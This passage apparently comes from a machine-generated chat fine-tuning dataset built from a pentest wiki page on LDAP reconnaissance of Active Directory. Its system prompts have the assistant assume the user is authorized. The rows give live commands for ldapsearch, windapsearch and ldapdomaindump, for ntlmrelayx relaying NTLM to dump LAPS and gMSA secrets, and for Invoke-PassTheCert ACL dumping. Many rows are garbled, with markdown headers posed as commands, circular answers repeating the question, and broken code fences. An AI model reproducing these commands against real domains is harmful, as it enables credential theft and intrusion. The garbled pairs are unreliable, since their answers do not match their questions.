\"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\n=== windapsearch\n\nThe windapsearch script (Go (preferred) or Python) can be used to enumerate basic but useful information.\n\n``bash", "metadata": {"corpus_index": 1272, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)?"}, {"role": "assistant", "content": "ldapsearch -h \"$DC_IP\" -x -b \"DC=DOMAIN,DC=LOCAL\"\nldapsearch -H \"ldap://$TARGET\" -x -b \"DC=DOMAIN,DC=LOCAL\"\n``\n\n=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\\n\n`bash\nldapsearch-ad --type all --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\nThe FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\\n\n`bash\nldapsearch-ad --type info --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\n=== windapsearch\n\nThe windapsearch script (Go (preferred) or Python) can be used to enumerate basic but useful information.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)?", "response": "ldapsearch -h \"$DC_IP\" -x -b \"DC=DOMAIN,DC=LOCAL\"\nldapsearch -H \"ldap://$TARGET\" -x -b \"DC=DOMAIN,DC=LOCAL\"\n``\n\n=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\\n\n`bash\nldapsearch-ad --type all --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\nThe FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\\n\n`bash\nldapsearch-ad --type info --server \"$DC_IP\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\"\n`\n\n=== windapsearch\n\nThe windapsearch script (Go (preferred) or Python) can be used to enumerate basic but useful information.\n\n``bash", "metadata": {"corpus_index": 1272, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}, {"role": "assistant", "content": "=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "response": "=== ldapsearch-ad\n\nThe ldapsearch-ad Python script can also be used to enumerate essential information like domain admins that have their password set to never expire, default password policies and the ones found in GPOs, trusts, kerberoastable accounts, and so on.\\", "metadata": {"corpus_index": 1273, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ldapsearch-ad`?"}, {"role": "assistant", "content": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ldapsearch-ad`?", "response": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "metadata": {"corpus_index": 1273, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for enumerate info in a base (e.g. naming context = dc=domain,dc=local)?"}, {"role": "assistant", "content": "The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for enumerate info in a base (e.g. naming context = dc=domain,dc=local)?", "response": "The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\", "metadata": {"corpus_index": 1274, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}, {"role": "assistant", "content": "The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "response": "The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\", "metadata": {"corpus_index": 1274, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\`?"}, {"role": "assistant", "content": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The FFL (Forest Functional Level), DFL (Domain Functional Level), DCFL (Domain Controller Functionality Level) and naming contexts can be listed with the following command.\\`?", "response": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "metadata": {"corpus_index": 1274, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL) during a pentest?"}, {"role": "assistant", "content": "=== windapsearch\n\nThe windapsearch script ([Go](https://github.com/ropnop/go-windapsearch) (preferred) or [Python](https://github.com/ropnop/windapsearch)) can be used to enumerate basic but useful information."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL) during a pentest?", "response": "=== windapsearch\n\nThe windapsearch script ([Go](https://github.com/ropnop/go-windapsearch) (preferred) or [Python](https://github.com/ropnop/windapsearch)) can be used to enumerate basic but useful information.", "metadata": {"corpus_index": 1275, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== windapsearch`?"}, {"role": "assistant", "content": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== windapsearch`?", "response": "This command is used for enumerate info in a base (e.g. naming context = dc=domain,dc=local). enumerate info in a base (e.g. naming context = DC=DOMAIN,DC=LOCAL)", "metadata": {"corpus_index": 1275, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about enumerate users (authenticated bind)?"}, {"role": "assistant", "content": "windapsearch -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc \"$DC_IP\" --module users"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about enumerate users (authenticated bind)?", "response": "windapsearch -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc \"$DC_IP\" --module users", "metadata": {"corpus_index": 1276, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for enumerate users (authenticated bind)"}, {"role": "assistant", "content": "windapsearch -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc \"$DC_IP\" --module users"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for enumerate users (authenticated bind)", "response": "windapsearch -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc \"$DC_IP\" --module users", "metadata": {"corpus_index": 1276, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does obtain metadata (anonymous bind) work?"}, {"role": "assistant", "content": "windapsearch --dc \"$DC_IP\" --module metadata\n``\n\n=== ldapdomaindump\n\nldapdomaindump is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files.\n\n`bash\nldapdomaindump --user \"$DOMAIN\"\\\\\"$USER\" --password \"$PASSWORD\" --outdir ldapdomaindump \"$DC_IP\"\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, ADCS, etc. through a NTLM authentication relayed within an LDAP session.\n\n`bash\nntlmrelayx -t ldap://\"$DC_IP\" --dump-adcs --dump-laps --dump-gmsa\n`\n\n=== Invoke-PassTheCert\n\nWith the Invoke-PassTheCert fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does obtain metadata (anonymous bind) work?", "response": "windapsearch --dc \"$DC_IP\" --module metadata\n``\n\n=== ldapdomaindump\n\nldapdomaindump is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files.\n\n`bash\nldapdomaindump --user \"$DOMAIN\"\\\\\"$USER\" --password \"$PASSWORD\" --outdir ldapdomaindump \"$DC_IP\"\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, ADCS, etc. through a NTLM authentication relayed within an LDAP session.\n\n`bash\nntlmrelayx -t ldap://\"$DC_IP\" --dump-adcs --dump-laps --dump-gmsa\n`\n\n=== Invoke-PassTheCert\n\nWith the Invoke-PassTheCert fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 1277, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do obtain metadata (anonymous bind)"}, {"role": "assistant", "content": "windapsearch --dc \"$DC_IP\" --module metadata\n``\n\n=== ldapdomaindump\n\nldapdomaindump is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files.\n\n`bash\nldapdomaindump --user \"$DOMAIN\"\\\\\"$USER\" --password \"$PASSWORD\" --outdir ldapdomaindump \"$DC_IP\"\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, ADCS, etc. through a NTLM authentication relayed within an LDAP session.\n\n`bash\nntlmrelayx -t ldap://\"$DC_IP\" --dump-adcs --dump-laps --dump-gmsa\n`\n\n=== Invoke-PassTheCert\n\nWith the Invoke-PassTheCert fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do obtain metadata (anonymous bind)", "response": "windapsearch --dc \"$DC_IP\" --module metadata\n``\n\n=== ldapdomaindump\n\nldapdomaindump is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files.\n\n`bash\nldapdomaindump --user \"$DOMAIN\"\\\\\"$USER\" --password \"$PASSWORD\" --outdir ldapdomaindump \"$DC_IP\"\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, ADCS, etc. through a NTLM authentication relayed within an LDAP session.\n\n`bash\nntlmrelayx -t ldap://\"$DC_IP\" --dump-adcs --dump-laps --dump-gmsa\n`\n\n=== Invoke-PassTheCert\n\nWith the Invoke-PassTheCert fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 1277, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for obtain metadata (anonymous bind)"}, {"role": "assistant", "content": "=== ldapdomaindump\n\n[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for obtain metadata (anonymous bind)", "response": "=== ldapdomaindump\n\n[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) is an Active Directory information dumper via LDAP, outputting information in human-readable HTML files.", "metadata": {"corpus_index": 1278, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ldapdomaindump`?"}, {"role": "assistant", "content": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ldapdomaindump`?", "response": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)", "metadata": {"corpus_index": 1278, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out obtain metadata (anonymous bind) during a pentest?"}, {"role": "assistant", "content": "=== ntlmrelayx\n\nWith [Impacket](https://github.com/SecureAuthCorp/impacket)'s [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, [ADCS](../movement/adcs/), etc. through a [NTLM authentication relayed](../movement/ntlm/relay.md) within an LDAP session."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out obtain metadata (anonymous bind) during a pentest?", "response": "=== ntlmrelayx\n\nWith [Impacket](https://github.com/SecureAuthCorp/impacket)'s [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) (Python), it is possible to gather lots of information regarding the domain users and groups, the computers, [ADCS](../movement/adcs/), etc. through a [NTLM authentication relayed](../movement/ntlm/relay.md) within an LDAP session.", "metadata": {"corpus_index": 1279, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ntlmrelayx`?"}, {"role": "assistant", "content": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ntlmrelayx`?", "response": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)", "metadata": {"corpus_index": 1279, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out obtain metadata (anonymous bind) during a pentest?"}, {"role": "assistant", "content": "=== Invoke-PassTheCert\n\nWith the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out obtain metadata (anonymous bind) during a pentest?", "response": "=== Invoke-PassTheCert\n\nWith the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, we may dump LDAP entries or ACEs as follows, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 1280, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Invoke-PassTheCert`?"}, {"role": "assistant", "content": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Invoke-PassTheCert`?", "response": "This command is used for obtain metadata (anonymous bind). obtain metadata (anonymous bind)", "metadata": {"corpus_index": 1280, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Dump any LDAP object in the 'ADLAB.LOCAL' domain, then extract the ones with the WORKSTATION_TRUST_ACCOUNT, or NORMAL_ACCOUNT UAC flags?"}, {"role": "assistant", "content": "$DumpLdap = Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties -LDAPFilter '(objectClass=)'\n$DumpLdap |?{$_.sAMAccountName -ne $null -and ($_.useraccountcontrol -like 'WORKSTATION_TRUST_ACCOUNT' -or $_.useraccountcontrol -like 'NORMAL_ACCOUNT')} |Select-Object sAMAccountName,description,useraccountcontrol,distinguishedname,serviceprincipalname |fl"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Dump any LDAP object in the 'ADLAB.LOCAL' domain, then extract the ones with the WORKSTATION_TRUST_ACCOUNT, or NORMAL_ACCOUNT UAC flags?", "response": "$DumpLdap = Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties -LDAPFilter '(objectClass=)'\n$DumpLdap |?{$_.sAMAccountName -ne $null -and ($_.useraccountcontrol -like 'WORKSTATION_TRUST_ACCOUNT' -or $_.useraccountcontrol -like 'NORMAL_ACCOUNT')} |Select-Object sAMAccountName,description,useraccountcontrol,distinguishedname,serviceprincipalname |fl", "metadata": {"corpus_index": 1281, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Dump any LDAP object in the 'ADLAB.LOCAL' domain, then extract the ones with the WORKSTATION_TRUST_ACCOUNT, or NORMAL_ACCOUNT UAC flags during a pentest?"}, {"role": "assistant", "content": "$DumpLdap = Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties -LDAPFilter '(objectClass=)'\n$DumpLdap |?{$_.sAMAccountName -ne $null -and ($_.useraccountcontrol -like 'WORKSTATION_TRUST_ACCOUNT' -or $_.useraccountcontrol -like 'NORMAL_ACCOUNT')} |Select-Object sAMAccountName,description,useraccountcontrol,distinguishedname,serviceprincipalname |fl"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Dump any LDAP object in the 'ADLAB.LOCAL' domain, then extract the ones with the WORKSTATION_TRUST_ACCOUNT, or NORMAL_ACCOUNT UAC flags during a pentest?", "response": "$DumpLdap = Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties -LDAPFilter '(objectClass=)'\n$DumpLdap |?{$_.sAMAccountName -ne $null -and ($_.useraccountcontrol -like 'WORKSTATION_TRUST_ACCOUNT' -or $_.useraccountcontrol -like 'NORMAL_ACCOUNT')} |Select-Object sAMAccountName,description,useraccountcontrol,distinguishedname,serviceprincipalname |fl", "metadata": {"corpus_index": 1281, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')"}, {"role": "assistant", "content": "$DumpInboundACLs = Invoke-PassTheCert -Action 'GetInboundACEs' -LdapConnection $LdapConnection -Object 'CN=Kinda KU. USY,CN=Users,DC=ADLAB,DC=LOCAL'\n$DumpInboundACLs |?{ $_.AceQualifier -eq 'AccessAllowed' -and ($_.AccessMaskNames -ilike 'GenericAll' -or $_.AccessMaskNames -ilike 'GenericWrite' -or $_.AccessMaskNames -ilike 'WriteProperty' -or $_.AccessMaskNames -ilike 'WriteDACL') -and ($_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}\\d{4,}' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}513' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}515' -or $_.SecurityIdentifier -in @('S-1-1-0', 'S-1-5-11', 'S-1-5-15', 'S-1-5-7', 'S-1-5-32-545', 'S-1-5-32-546')) }\n``\n\n:::\n\nNetExec (Python) also has useful modules that can be used to\n\n* map information regarding AD-CS (Active Directory Certificate Services)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the Machine Account Quota domain-level attribute's value\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')", "response": "$DumpInboundACLs = Invoke-PassTheCert -Action 'GetInboundACEs' -LdapConnection $LdapConnection -Object 'CN=Kinda KU. USY,CN=Users,DC=ADLAB,DC=LOCAL'\n$DumpInboundACLs |?{ $_.AceQualifier -eq 'AccessAllowed' -and ($_.AccessMaskNames -ilike 'GenericAll' -or $_.AccessMaskNames -ilike 'GenericWrite' -or $_.AccessMaskNames -ilike 'WriteProperty' -or $_.AccessMaskNames -ilike 'WriteDACL') -and ($_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}\\d{4,}' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}513' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}515' -or $_.SecurityIdentifier -in @('S-1-1-0', 